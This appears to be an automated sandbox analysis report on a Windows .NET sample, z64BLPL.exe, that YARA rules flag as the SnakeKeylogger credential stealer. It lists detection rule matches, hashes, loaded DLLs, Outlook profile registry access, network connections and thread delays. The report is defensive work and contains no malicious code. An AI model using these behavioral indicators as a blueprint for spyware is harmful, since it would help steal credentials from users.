Source: z64BLPL.exe, 00000000.00000002.4122665440.0000000003AF5000.00000004.00000800.00020000.00000000.sdmp, z64BLPL.exe, 00000000.00000002.4122665440.0000000003C99000.00000004.00000800.00020000.00000000.sdmp, z64BLPL.exe, 00000000.00000002.4122665440.0000000003D92000.00000004.00000800.00020000.00000000.sdmp, z64BLPL.exe, 00000000.00000002.4122665440.0000000003ACA000.00000004.00000800.00020000.00000000.sdmp, z64BLPL.exe, 00000000.00000002.4122665440.0000000003B3F000.00000004.00000800.00020000.00000000.sdmp, z64BLPL.exe, 00000000.00000002.4122665440.0000000003C6E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
Source: z64BLPL.exe, 00000000.00000002.4122665440.0000000003AEF000.00000004.00000800.00020000.00000000.sdmp, z64BLPL.exe, 00000000.00000002.4122665440.0000000003B3D000.00000004.00000800.00020000.00000000.sdmp, z64BLPL.exe, 00000000.00000002.4122665440.0000000003B64000.00000004.00000800.00020000.00000000.sdmp, z64BLPL.exe, 00000000.00000002.4122665440.0000000003CE1000.00000004.00000800.00020000.00000000.sdmp, z64BLPL.exe, 00000000.00000002.4120925537.0000000002B1D000.00000004.00000800.00020000.00000000.sdmp, z64BLPL.exe, 00000000.00000002.4122665440.0000000003C93000.00000004.00000800.00020000.00000000.sdmp, z64BLPL.exe, 00000000.00000002.4122665440.0000000003DB6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
Source: z64BLPL.exe, 00000000.00000002.4122665440.0000000003AF5000.00000004.00000800.00020000.00000000.sdmp, z64BLPL.exe, 00000000.00000002.4122665440.0000000003C99000.00000004.00000800.00020000.00000000.sdmp, z64BLPL.exe, 00000000.00000002.4122665440.0000000003D92000.00000004.00000800.00020000.00000000.sdmp, z64BLPL.exe, 00000000.00000002.4122665440.0000000003ACA000.00000004.00000800.00020000.00000000.sdmp, z64BLPL.exe, 00000000.00000002.4122665440.0000000003B3F000.00000004.00000800.00020000.00000000.sdmp, z64BLPL.exe, 00000000.00000002.4122665440.0000000003C6E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
Source: z64BLPL.exe, 00000000.00000002.4120925537.0000000002C06000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.office.com/
Source: z64BLPL.exe, 00000000.00000002.4120925537.0000000002C01000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.office.com/lB

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49732
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49743
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown	Network traffic detected: HTTP traffic on port 49731 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49732 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49741
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49752
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49751
Source: unknown	Network traffic detected: HTTP traffic on port 49741 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49743 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49749 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49747 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49745 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49751 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49752 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49749
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49747
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49745

Source: unknown

HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49752 version: TLS 1.2

System Summary

Malicious sample detected (through community Yara rule)

Source: z64BLPL.exe, type: SAMPLE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: z64BLPL.exe, type: SAMPLE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: z64BLPL.exe, type: SAMPLE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0.0.z64BLPL.exe.690000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.0.z64BLPL.exe.690000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 0.0.z64BLPL.exe.690000.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 00000000.00000000.1673795940.0000000000692000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: z64BLPL.exe PID: 7268, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown

Source: C:\Users\user\Desktop\z64BLPL.exe

Process Stats: CPU usage > 49%

Source: C:\Users\user\Desktop\z64BLPL.exe	Code function: 0_2_00BFC571	0_2_00BFC571
Source: C:\Users\user\Desktop\z64BLPL.exe	Code function: 0_2_00BF268C	0_2_00BF268C
Source: C:\Users\user\Desktop\z64BLPL.exe	Code function: 0_2_00BF5708	0_2_00BF5708
Source: C:\Users\user\Desktop\z64BLPL.exe	Code function: 0_2_00D3A088	0_2_00D3A088
Source: C:\Users\user\Desktop\z64BLPL.exe	Code function: 0_2_00D3C146	0_2_00D3C146
Source: C:\Users\user\Desktop\z64BLPL.exe	Code function: 0_2_00D37118	0_2_00D37118
Source: C:\Users\user\Desktop\z64BLPL.exe	Code function: 0_2_00D3D2CB	0_2_00D3D2CB
Source: C:\Users\user\Desktop\z64BLPL.exe	Code function: 0_2_00D35362	0_2_00D35362
Source: C:\Users\user\Desktop\z64BLPL.exe	Code function: 0_2_00D3C468	0_2_00D3C468
Source: C:\Users\user\Desktop\z64BLPL.exe	Code function: 0_2_00D3D599	0_2_00D3D599
Source: C:\Users\user\Desktop\z64BLPL.exe	Code function: 0_2_00D3C738	0_2_00D3C738
Source: C:\Users\user\Desktop\z64BLPL.exe	Code function: 0_2_00D369A0	0_2_00D369A0
Source: C:\Users\user\Desktop\z64BLPL.exe	Code function: 0_2_00D3EAA8	0_2_00D3EAA8
Source: C:\Users\user\Desktop\z64BLPL.exe	Code function: 0_2_00D3FC37	0_2_00D3FC37
Source: C:\Users\user\Desktop\z64BLPL.exe	Code function: 0_2_00D3CD28	0_2_00D3CD28
Source: C:\Users\user\Desktop\z64BLPL.exe	Code function: 0_2_00D3CFF7	0_2_00D3CFF7
Source: C:\Users\user\Desktop\z64BLPL.exe	Code function: 0_2_00D3F7EC	0_2_00D3F7EC
Source: C:\Users\user\Desktop\z64BLPL.exe	Code function: 0_2_00D339ED	0_2_00D339ED
Source: C:\Users\user\Desktop\z64BLPL.exe	Code function: 0_2_00D329EC	0_2_00D329EC
Source: C:\Users\user\Desktop\z64BLPL.exe	Code function: 0_2_00D3EA9B	0_2_00D3EA9B
Source: C:\Users\user\Desktop\z64BLPL.exe	Code function: 0_2_00D33AA1	0_2_00D33AA1
Source: C:\Users\user\Desktop\z64BLPL.exe	Code function: 0_2_00D33E09	0_2_00D33E09
Source: C:\Users\user\Desktop\z64BLPL.exe	Code function: 0_2_066996C8	0_2_066996C8
Source: C:\Users\user\Desktop\z64BLPL.exe	Code function: 0_2_06699DF0	0_2_06699DF0
Source: C:\Users\user\Desktop\z64BLPL.exe	Code function: 0_2_06692288	0_2_06692288
Source: C:\Users\user\Desktop\z64BLPL.exe	Code function: 0_2_06690B30	0_2_06690B30
Source: C:\Users\user\Desktop\z64BLPL.exe	Code function: 0_2_06691BA8	0_2_06691BA8
Source: C:\Users\user\Desktop\z64BLPL.exe	Code function: 0_2_06692970	0_2_06692970
Source: C:\Users\user\Desktop\z64BLPL.exe	Code function: 0_2_066951A8	0_2_066951A8
Source: C:\Users\user\Desktop\z64BLPL.exe	Code function: 0_2_0669CE20	0_2_0669CE20
Source: C:\Users\user\Desktop\z64BLPL.exe	Code function: 0_2_0669CE0F	0_2_0669CE0F
Source: C:\Users\user\Desktop\z64BLPL.exe	Code function: 0_2_0669D6C0	0_2_0669D6C0
Source: C:\Users\user\Desktop\z64BLPL.exe	Code function: 0_2_0669D6D0	0_2_0669D6D0
Source: C:\Users\user\Desktop\z64BLPL.exe	Code function: 0_2_0669DF7F	0_2_0669DF7F
Source: C:\Users\user\Desktop\z64BLPL.exe	Code function: 0_2_0669DF80	0_2_0669DF80
Source: C:\Users\user\Desktop\z64BLPL.exe	Code function: 0_2_0669EC78	0_2_0669EC78
Source: C:\Users\user\Desktop\z64BLPL.exe	Code function: 0_2_066994A8	0_2_066994A8
Source: C:\Users\user\Desktop\z64BLPL.exe	Code function: 0_2_0669EC88	0_2_0669EC88
Source: C:\Users\user\Desktop\z64BLPL.exe	Code function: 0_2_0669F528	0_2_0669F528
Source: C:\Users\user\Desktop\z64BLPL.exe	Code function: 0_2_06698D20	0_2_06698D20
Source: C:\Users\user\Desktop\z64BLPL.exe	Code function: 0_2_0669F538	0_2_0669F538
Source: C:\Users\user\Desktop\z64BLPL.exe	Code function: 0_2_06698D11	0_2_06698D11
Source: C:\Users\user\Desktop\z64BLPL.exe	Code function: 0_2_06699D89	0_2_06699D89
Source: C:\Users\user\Desktop\z64BLPL.exe	Code function: 0_2_0669D278	0_2_0669D278
Source: C:\Users\user\Desktop\z64BLPL.exe	Code function: 0_2_06692278	0_2_06692278
Source: C:\Users\user\Desktop\z64BLPL.exe	Code function: 0_2_0669DB28	0_2_0669DB28
Source: C:\Users\user\Desktop\z64BLPL.exe	Code function: 0_2_06690B20	0_2_06690B20
Source: C:\Users\user\Desktop\z64BLPL.exe	Code function: 0_2_0669DB19	0_2_0669DB19
Source: C:\Users\user\Desktop\z64BLPL.exe	Code function: 0_2_0669E3CA	0_2_0669E3CA
Source: C:\Users\user\Desktop\z64BLPL.exe	Code function: 0_2_0669E3D8	0_2_0669E3D8
Source: C:\Users\user\Desktop\z64BLPL.exe	Code function: 0_2_06691B97	0_2_06691B97
Source: C:\Users\user\Desktop\z64BLPL.exe	Code function: 0_2_06690040	0_2_06690040
Source: C:\Users\user\Desktop\z64BLPL.exe	Code function: 0_2_0669E82F	0_2_0669E82F
Source: C:\Users\user\Desktop\z64BLPL.exe	Code function: 0_2_0669E830	0_2_0669E830
Source: C:\Users\user\Desktop\z64BLPL.exe	Code function: 0_2_06690006	0_2_06690006
Source: C:\Users\user\Desktop\z64BLPL.exe	Code function: 0_2_0669F0E0	0_2_0669F0E0
Source: C:\Users\user\Desktop\z64BLPL.exe	Code function: 0_2_0669F0D1	0_2_0669F0D1
Source: C:\Users\user\Desktop\z64BLPL.exe	Code function: 0_2_0669F982	0_2_0669F982
Source: C:\Users\user\Desktop\z64BLPL.exe	Code function: 0_2_06695198	0_2_06695198
Source: C:\Users\user\Desktop\z64BLPL.exe	Code function: 0_2_0669F990	0_2_0669F990

Source: z64BLPL.exe, 00000000.00000002.4120472413.0000000000D6E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs z64BLPL.exe
Source: z64BLPL.exe, 00000000.00000002.4119946936.0000000000AF7000.00000004.00000010.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameUNKNOWN_FILET vs z64BLPL.exe
Source: z64BLPL.exe, 00000000.00000000.1673826294.00000000006D6000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameRemington.exe4 vs z64BLPL.exe
Source: z64BLPL.exe	Binary or memory string: OriginalFilenameRemington.exe4 vs z64BLPL.exe

Source: z64BLPL.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: z64BLPL.exe, type: SAMPLE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: z64BLPL.exe, type: SAMPLE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: z64BLPL.exe, type: SAMPLE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.0.z64BLPL.exe.690000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.0.z64BLPL.exe.690000.0.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.0.z64BLPL.exe.690000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 00000000.00000000.1673795940.0000000000692000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: z64BLPL.exe PID: 7268, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23

Source: z64BLPL.exe, .cs	Cryptographic APIs: 'TransformFinalBlock'
Source: z64BLPL.exe, -J--.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: z64BLPL.exe, -J--.cs	Cryptographic APIs: 'TransformFinalBlock'

Source: classification engine

Classification label: mal100.troj.spyw.winEXE@1/0@4/4

Source: C:\Users\user\Desktop\z64BLPL.exe

Mutant created: NULL

Source: z64BLPL.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: z64BLPL.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.79%

Source: C:\Users\user\Desktop\z64BLPL.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: z64BLPL.exe

ReversingLabs: Detection: 73%

Source: C:\Users\user\Desktop\z64BLPL.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe	Section loaded: dpapi.dll	Jump to behavior

Source: C:\Users\user\Desktop\z64BLPL.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Jump to behavior

Source: z64BLPL.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: z64BLPL.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source: C:\Users\user\Desktop\z64BLPL.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate			Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot			Jump to behavior

Source: C:\Users\user\Desktop\z64BLPL.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Users\user\Desktop\z64BLPL.exe	Memory allocated: D30000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe	Memory allocated: 2A10000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe	Memory allocated: 2850000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Users\user\Desktop\z64BLPL.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe	Thread delayed: delay time: 599875	Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe	Thread delayed: delay time: 599765	Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe	Thread delayed: delay time: 599636	Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe	Thread delayed: delay time: 599531	Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe	Thread delayed: delay time: 599421	Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe	Thread delayed: delay time: 599312	Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe	Thread delayed: delay time: 599203	Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe	Thread delayed: delay time: 599093	Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe	Thread delayed: delay time: 598984	Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe	Thread delayed: delay time: 598875	Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe	Thread delayed: delay time: 598765	Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe	Thread delayed: delay time: 598656	Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe	Thread delayed: delay time: 598546	Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe	Thread delayed: delay time: 598437	Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe	Thread delayed: delay time: 598328	Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe	Thread delayed: delay time: 598218	Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe	Thread delayed: delay time: 598109	Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe	Thread delayed: delay time: 597996	Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe	Thread delayed: delay time: 597888	Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe	Thread delayed: delay time: 597741	Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe	Thread delayed: delay time: 597637	Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe	Thread delayed: delay time: 597531	Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe	Thread delayed: delay time: 597417	Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe	Thread delayed: delay time: 597312	Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe	Thread delayed: delay time: 597203	Jump to behavior
